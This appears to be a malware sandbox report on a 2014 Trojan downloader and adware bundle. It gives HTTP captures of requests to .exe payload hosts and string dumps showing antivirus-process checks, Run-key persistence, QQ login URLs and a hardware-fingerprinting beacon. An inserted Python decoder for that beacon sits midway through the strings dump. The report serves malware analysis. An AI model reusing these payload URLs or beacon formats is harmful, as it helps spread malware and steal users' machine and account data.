HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:50 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 948
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body style=" margin:0px">.. <form name="form1" method="post" action="Downloaderconfig.aspx?imgtype=9158" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTU4MjMyMzI1ZGTU5ZBXmwe1gDNP/W SPke44 A65Q==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="91FFCAD5" />..</div>.. <div>.. .. <object >.. .. <embed src="http://tj.9158.com/temp/flash/1.swf" width="490px" height="180px" quality="high" pluginspage="hXXp://VVV.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" ></embed>.. </object>.. .. </div>.. </form>..</body>..</html>....
GET /controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=237&ext_1=2&ext_2=feitian_wd&ext_3=905848&ext_4=855392B634F846E395634D027DCD1AB4&ext_5=1c4e8afc5f13c9a8784201dba5a3f2e0&ext_6=2&browser_type=3001 HTTP/1.1
User-Agent: HTTPDownloader
Host: a.clickdata.37wan.com
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 20 Dec 2014 05:14:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2757cfd3a4293290c5b7afd7714204f3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
1..1..0..
GET /mmliao/MM-liao8398.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: show.man1234.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Date: Sat, 20 Dec 2014 05:13:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: hXXp://down.cncpa.net:9000/mmliao/MM-liao9906.exe
Set-Cookie: ASP.NET_SessionId=w2k1ic55pk0pnr45szporcfn; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 804
<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://down.cncpa.net:9000/mmliao/MM-liao9906.exe">here</a>.</h2>..</body></html>....<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="../download/SubConfig.aspx?id1=8398" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGQiFbVbBJv7A/lcSr1Og9mkU0lctw==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="9F81D7CC" />..</div>.. <div>.. .. </div>.. </form>..</body>..</html>....
GET /ffdy_238_63518.exe HTTP/1.1
Referer: hXXp://VVV.hanyueyr.com/ffdy_238_63518.exe
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: VVV.hanyueyr.com
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Sat, 20 Dec 2014 05:13:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
location: hXXp://jafaye.ynhaoya.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027
0..
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
1419052427l238l63518.exe&_upt=6ec6a9a21419053027_1812:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp\Inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp\Inetc.dll
NjM1MTguZXhlJl91cHQ9NmVjNmE5YTIxNDE5MDUzMDI3/40.html
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp
TguZXhlJl91cHQ9NmVjNmE5YTIxNDE5MDUzMDI3/40.html
s.ZM!f
@.reloc
MSVCR80.dll
_crt_debugger_hook
Base64.dll
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
/password
Uploading %s
&.Gi0
%Program Files%\1.rar
emp\nsl40.tmp
1.rar
Grub4DOS Toolbox for Windows 0.1
am Files\nsu41.tmp
mp\nsl40.tmp
rogram Files\1.rar
ray.exe
360sd.exe
hXXp://VVV.bangshijz.com
hXXp://pchome.b0.upaiyun.com/1.ico
n/iplookup/iplookup.php
p://int.dpool.sina.com.cn/iplookup/iplookup.php
hXXp://idc.xn--r93a55o.cc/onlines_30863.exe
80.1123.exe
onlines_30863.exe
c:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027
%Program Files%
1419052427l238l63518.exe&_upt=6ec6a9a21419053027
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3F.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.46
1419052427l238l63518.exe&_upt=6ec6a9a21419053027_1812_rwx_10004000_00001000:
callback%d
MM-liao8398.exe_824:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
SSSSh
SSSSh
FtPh
FtPh
tGHt.Ht&
tGHt.Ht&
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
OnTitleChange: text="%s"
homeUrl
homeUrl
downUrl
downUrl
C:\Windows\Temp\temp.icon
C:\Windows\Temp\temp.icon
c://temp.icon
c://temp.icon
ProExe
ProExe
DownloadUrl
DownloadUrl
ErrorUrl
ErrorUrl
AdvertUrl
AdvertUrl
XieyiUrl
XieyiUrl
hXXp://tj.9158.com/Opendownloadernewxml.aspx
hXXp://tj.9158.com/Opendownloadernewxml.aspx
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
**** DISK_GEOMETRY_EX for drive %d ****
**** DISK_GEOMETRY_EX for drive %d ****
Disk is%s fixed
Disk is%s fixed
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
Vendor Id = [%s]
Vendor Id = [%s]
Product Id = [%s]
Product Id = [%s]
Product Revision = [%s]
Product Revision = [%s]
Serial Number = [%s]
Serial Number = [%s]
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
DeviceType: x
DeviceType: x
DeviceTypeModifier: x
DeviceTypeModifier: x
RemovableMedia: %d
RemovableMedia: %d
CommandQueueing: %d
CommandQueueing: %d
BusType: %d
BusType: %d
%d ReadPhysicalDriveInNTWithZeroRights ERROR
%d ReadPhysicalDriveInNTWithZeroRights ERROR
CreateFile(%s) returned INVALID_HANDLE_VALUE
CreateFile(%s) returned INVALID_HANDLE_VALUE
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
Drive%dType
Drive%dType
DriveÜontrollerBufferSize
DriveÜontrollerBufferSize
DriveÜontrollerRevisionNumber
DriveÜontrollerRevisionNumber
Drive%dSerialNumber
Drive%dModelNumber
Controller Buffer Size on Drive___: %s bytes
Drive Controller Revision Number__: [%s]
Drive Serial Number_______________: [%s]
Drive Model Number________________: [%s]
Drive %d -
%d ReadPhysicalDriveInNTWithAdminRights ERROR
No device found at position %d (%d)
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTUsingSmart ERROR
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
Error Code %d
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
ERROR: Could not SetPriorityClass, LastError: %d
\\.\Scsi%d:
Hard Drive Model Number___________: %s
Hard Drive Serial Number__________: %s
%s (%s:%d)
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
softlist=%s&lmarkid=%s
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
w@C:\Windows\Temp\
%sDownLoad
_%s%s.exe
_%s.exe
/S /D=%s
%sDownLoad\%s
Browser=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
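The five format strings ending at the DownloadInsertinfo.aspx URL are the pieces the installer joins into one GET request to tj.9158.com: a browser field, then a block of host identifiers (screen resolution, OS name, a key, MAC address, hard-drive identifier, CPU, graphics adapter), then a block with a Safe field, two QQ-related values, campaign markers (Lmarkid, Wmarkid, Mtype, flag), a tick counter and a status, and finally install timing plus a fixed version tag V1.9. The script below is an added example written for this report, not code from the sample or from the report: it derives the field layout from those templates, decodes a constructed capture of such a request, and groups the fields by what they disclose. Only the templates are taken from the dump; the captured request, the refang() helper and the three field groupings are my assumptions.

```python
"""Decode the tj.9158.com "DownloadInsertinfo" beacon from its printf templates.

Added example for this report; it is not code from the sample or the report.
BEACON_BASE and BEACON_TEMPLATES are copied from the string dump (the report
defangs http as hXXp); everything else here is constructed for illustration.
"""
import re
from urllib.parse import parse_qsl, urlsplit

BEACON_BASE = "hXXp://tj.9158.com/DownloadInsertinfo.aspx?"
BEACON_TEMPLATES = (
    "Browser=%s",
    "&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s",
    "&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d"
    "&flag=%s&status=%d&qqnumber=%s",
    "&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9",
)

# Assumed grouping of the fields by what they disclose (my labels, not the report's).
HOST_FINGERPRINT = {"Resolution", "OS", "KEY", "Mac", "HardDrive", "CPU", "Graphics"}
ACCOUNT_FIELDS = {"QQ", "qqnumber"}
CAMPAIGN_FIELDS = {"Lmarkid", "Wmarkid", "Mtype", "flag"}

# One "name=value" pair of a template; the value is %s, %d or a fixed literal.
_PAIR_RE = re.compile(r"&?([A-Za-z]+)=(%[sd]|[^&]*)")


def refang(url):
    """Undo the report's hXXp:// defanging so urlsplit recognises the scheme."""
    return url.replace("hXXp://", "http://", 1)


def template_fields():
    """Field layout implied by the templates: ordered (name, kind) pairs where
    kind is 'str' for %s, 'int' for %d, or the fixed literal (e.g. 'V1.9')."""
    fields = []
    for template in BEACON_TEMPLATES:
        for name, spec in _PAIR_RE.findall(template):
            fields.append((name, {"%s": "str", "%d": "int"}.get(spec, spec)))
    return fields


def decode_beacon(url):
    """Return the beacon's fields as a dict, or None if `url` was not built from
    these templates (wrong host or path, different field layout, a non-numeric
    %d field, or a fixed literal such as V1.9 that does not match)."""
    base = urlsplit(refang(BEACON_BASE))
    parts = urlsplit(refang(url))
    if parts.netloc.lower() != base.netloc or parts.path != base.path:
        return None
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    layout = template_fields()
    if list(query) != [name for name, _ in layout]:
        return None
    decoded = {}
    for name, kind in layout:
        value = query[name]
        if kind == "int":
            if not re.fullmatch(r"-?\d+", value):
                return None
            decoded[name] = int(value)
        elif kind == "str" or value == kind:
            decoded[name] = value
        else:
            return None
    return decoded


def classify(decoded):
    """Group decoded fields by the kind of data they leak."""
    groups = {"host_fingerprint": HOST_FINGERPRINT,
              "account": ACCOUNT_FIELDS,
              "campaign": CAMPAIGN_FIELDS}
    return {label: {k: v for k, v in decoded.items() if k in names}
            for label, names in groups.items()}


# Constructed capture of one beacon (all values invented; Resolution follows the
# dump's "%d*%d" template and Mac its "X-X-X-X-X-X" template).
SAMPLE_REQUEST = (
    "hXXp://tj.9158.com/DownloadInsertinfo.aspx?Browser=IE6"
    "&Resolution=1024*768&OS=Microsoft%20Windows%20XP&KEY=abc123"
    "&Mac=00-0C-29-AA-BB-CC&HardDrive=WD-WCAV12345678&CPU=Intel&Graphics=VMware"
    "&Safe=360safe.exe&QQ=1&Sougou=0&Lmarkid=lm01&Wmarkid=wm01&Mtype=1"
    "&tick=1419052427&flag=ok&status=0&qqnumber=123456789"
    "&downloadtime=3&setuptime=12&downloadflag=1&v=V1.9"
)

if __name__ == "__main__":
    for label, values in classify(decode_beacon(SAMPLE_REQUEST)).items():
        print(label, values)
```

Because the layout check compares field names in order, a request that adds, drops or reorders a field is rejected rather than partially decoded; the dump's logtest.aspx request, for instance, has a different path and layout and returns None. Loosen the comparison if you need to match other versions of this beacon.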
%ld%s%s
%d*%d
%s(%s)
...%d%c
%Program Files%
%s Inx:%d Offset:%d Len:%d
.tmp.tg
****ERR:%d,
nInx:%d, offset:%d, siz:%d
%d, lRemain
ConnectSvr:%s
X-X-X-X-X-X
SOFTWARE\%s
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Server 2008 R2
Microsoft Windows 7
unknown OperatingSystem.
Web Edition
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductName
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
SOFTWARE\Microsoft\Windows NT\CurrentVersion
http\shell\open\command
%s %s
\SogouExe\SogouExe.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
M.exe
deepscan\zhudongfangyu.exe
360safe.exe
ZhuDongFangYu.exe
QQ.exe
T58web
9158web
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP/1.1
%s?log=%s&version=20140121
hXXp://tj.9158.com/logtest.aspx
:%d,server:%s, ip:%s,
:url:%s, server:%s,error msg:%s, errcode:%d
kernel32.dll
CNotSupportedException
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
CHttpConnection
CHttpFile
hXXp://
WININET.DLL
HTTP/1.0
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
user32.dll
ole32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
OLEACC.dll
SHLWAPI.dll
WSOCK32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
GetKeyState
UnhookWindowsHookEx
SetWindowsHookExA
CreateDialogIndirectParamA
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyA
RegCreateKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegEnumKeyA
ADVAPI32.dll
ShellExecuteA
ShellExecuteExA
SHELL32.dll
COMCTL32.dll
oledlg.dll
OLEAUT32.dll
GdiplusShutdown
gdiplus.dll
NETAPI32.dll
VERSION.dll
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
InternetOpenUrlA
HttpOpenRequestA
WININET.dll
.?AVCCmdTarget@@
.PAVCFileException@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.PAVCException@@
.?AVCFTPTask@@
.?AVCHttpService@@
.?AVCMD5Checksum@@
.PAVCObject@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
00000000000000000001
%Program Files%\MM-liao8398.exe
accKeyboardShortcut
mscoree.dll
ekernel32.dll
KERNEL32.DLL
DownloadInstall.Document
(*.*)
Output.prn$
(*.prn)|*.prn|
(*.*)|*.*||
1, 0, 0, 1
DownloadInstall.EXE
dts.exe_1940:
.text
`.rdata
@.data
.rsrc
@.reloc
kernel32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
RegDeleteKeyExW
E:\37WanWork\delphicode\vcLander\dts_channel\04
\Bin\lander.pdb
KERNEL32.dll
GetKeyState
USER32.dll
GDI32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
MSIMG32.dll
GdiplusShutdown
gdiplus.dll
FindFirstUrlCacheEntryW
DeleteUrlCacheEntryW
FindNextUrlCacheEntryW
FindCloseUrlCache
InternetCrackUrlW
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpQueryInfoW
WININET.dll
IPHLPAPI.DLL
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
.?AV?$CEventHandler@VCFormGame@@P81@AEXIIJ@ZVICWebNotifyEventHandler@@@@
.?AV?$CCWebNotifyEventHandler@VCFormGame@@P81@AEXIIJ@Z@@
.?AV?$_IDispEventLocator@$00$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$00VCBrowserView@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$CFEvent@VCCWebNotifyEventHandler@@VFCWebNotifyEventHandler@@VICWebNotifyEventHandler@@@@
.?AVCWebNotify@@
.?AVICWebNotifyEventHandler@@
.?AV?$CEventHandler@VCFormLogin@@P81@AEXIIJ@ZVICWebNotifyEventHandler@@@@
.?AV?$CCWebNotifyEventHandler@VCFormLogin@@P81@AEXIIJ@Z@@
.?AVCFormLogin@@
.?AVCSQLabel@@
#&$ """#*./' ,,10*,,$&&) ,*,-#%&#$(-.',-*# 8142).-'.1,4;0165 --"$$7167(-,&(() >@@8@@,.. --577(((&((#%% --""'))387%%% )))$$$[[[???...((($$$"""$$$$#644BBBFFF'%ìB#%h9FFFKHJJMK/.0///DHIEGGKMMLKOGLJ@>>PPPDBADCEKII&'%!##NOM999%&*EGG#%&)-.253" $#%$""!!!"$ÎE$$$'"#(') /0KHJJIKDDD134311CDB)))***000))),,,(((:::9:8:::@=?'(&'%F6FHHKKKBAC111!" KIH689, -GIJCA@ "#,**FFFIHD@BC@=?879IGGGED --022CCC=;;444324%&$***546<:9421>1(1,101415%6X62$2(2,2029 9$9(9,90949894 4(40484@4ekernel32.dllmscoree.dllKERNEL32.DLLhXXp://kf.37.com/hXXp://dts.37.comhXXp://bbs.37.com/index.php?gid=2447wd_returnlogin=1Software\Microsoft\Windows\CurrentVersion\Run"%s" %shXXp://dts.37.com/gonglue/ErrorUrlhXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1hXXp://d.wanyouxi7.com/37/dts/official/app.inihXXp://d.wanyouxi7.com/37/dts/official/Setup_37dts.exe%Y-%m-%d %H:%M:%S%Y%m%d%H%M%Srefer=%s&uid=%s&version=%d&installtime=%s&runcount=%d&curtime=%s&showlogintype=3hXXp://pay.37.com/select.php?gamename=dts&gameserver=%s&username=%siconAnimate.exe@HKEY_CURRENT_CONFIGHKEY_DYN_DATAHKEY_PERFORMANCE_DATAHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CLASSES_ROOTAAdvapi32.dllLastUpgrade.ini37LanderUpgrade.exeLander.iniBHTTPDownloaderContent-Type: application/x-www-form-urlencoded; charset=UTF-8;System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%s\Connection
XXXXXX
QQmenu.exe
Txwu.exe
2006.exe
connetbar.exe
wbc.exe
sunflowerTools.exe
LBSserver.exe
TLnbLdr.exe
DeepinStatus.exe
\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
\SOFTWARE\TyDyy.com
hXXp://a.clickdata.37wan.com/controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=%s&ext_1=%d&ext_2=%s&ext_3=%s&ext_4=%s&ext_5=%s&ext_6=%d&browser_type=%d
InstallStat.tmp
ActiveStat.tmp
%Y-%m-%d
hXXp://a.clickdata.37wan.com/controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=%s&ext_1=%d&ext_2=%s&ext_3=%s&ext_4=%s&ext_5=%s&ext_6=%d&browser_type=%d&position=%d&ext_7=%s
UninstallStat.tmp
X-X-X-X
\\.\IDE21201.VXD
\\.\PhysicalDrive%d
\\.\Scsi%d:
%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe
3.0.0.0
3, 0, 0, 0
iexplore.exe_1768:
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512
9158.exe_2088:
.text
`.rdata
@.data
.rsrc
unzip 0.18 Copyright 1998-2002 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
1.1.4
inflate 1.1.4 Copyright 1995-2002 Mark Adler
VERSION.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
?IsControlHaveSkin@CAppSysOperation@@UAEHXZ
?CleanBitmapMem@CAppSysOperation@@UAEHXZ
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@PAVCBitmap@@@Z
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@@Z
?InitializeOperation@CAppSysOperation@@UAEXPAVCWnd@@@Z
?CleanSkin@CAppSysOperation@@UAEHPAX@Z
?DrawContent@CAppSysOperation@@UAEHPAVCDC@@VCString@@AAVCRect@@H@Z
?AdjustPosition@CAppSysOperation@@UAEHHHHH@Z
?AdjustPosition@CAppSysOperation@@UAEHUtagRECT@@@Z
?DrawSkin@CAppSysOperation@@UAEHPAUtagDRAWITEMSTRUCT@@@Z
?PaintBackGround@CAppSysOperation@@UAEHPAVCDC@@@Z
?CleanUp@CAppSysOperation@@UAEXXZ
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@PAVCBitmap@@@Z
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@@Z
?PreTranslateMessage@CUIButtonTemplate@@MAEHPAUtagMSG@@@Z
?messageMap@CUIButtonTemplate@@1UAFX_MSGMAP@@B
?GetCurrentSkin@CAppSysOperation@@UAEHPAX@Z
?LoadSkin@CAppSysOperation@@UAEHPAX@Z
?FitBitmapSize@CAppSysOperation@@UAEXXZ
?messageMap@CCustomDlg@@1UAFX_MSGMAP@@B
?LoadSkinToBitmap@CAppSysOperation@@SA_NAAVCBitmap@@PAXAA_N@Z
?SetSkinPath@CAppSysOperation@@SAXVCString@@@Z
?GetPictureExEx@CSkinConfContext@@QAEPAXPBDH@Z
?messageMap@CUIDlgTemplate@@1UAFX_MSGMAP@@B
?GetBitmapHeight@CAppSysOperation@@QAEHXZ
?GetBitmapWidth@CAppSysOperation@@QAEHXZ
?GetMessageMap@CUIListCtrlEx@@MBEPBUAFX_MSGMAP@@XZ
MVUILib.dll
MSIMG32.dll
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
GetCPInfo
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEPRO32.DLL
OLEAUT32.dll
WSOCK32.dll
MSVCP60.dll
GdiplusShutdown
gdiplus.dll
publictool.dll
IdleTrac.dll
?WbBase_Login@CWeiboModule@@QAEHHPBD0@Z
?WB_RelationOperation@CWeiboModule@@QAEH_J00HHH@Z
CWeiboClient.dll
NETAPI32.dll
SHLWAPI.dll
WINMM.dll
pdh.dll
9158.exe
?GetPassword@CRoomInfo@@QAE?AVCString@@XZ
?GetPort@CRoomInfo@@QAEHXZ
?SetPassword@CRoomInfo@@QAEXPBD@Z
?SetPort@CRoomInfo@@QAEXH@Z
ItemList/Item[ItemName = '%s']/ItemText
ItemList/Item[ItemID = %d]/ItemText
IDispatch error #%d
SkinRes\HollSplitter.bmp
SkinRes\VIPRoomSkin\row.bmp
%s\%s%s9158.exe
chatQK.xml
SkinRes\unlock.bmp
dance_room/dance_coffer.aspx
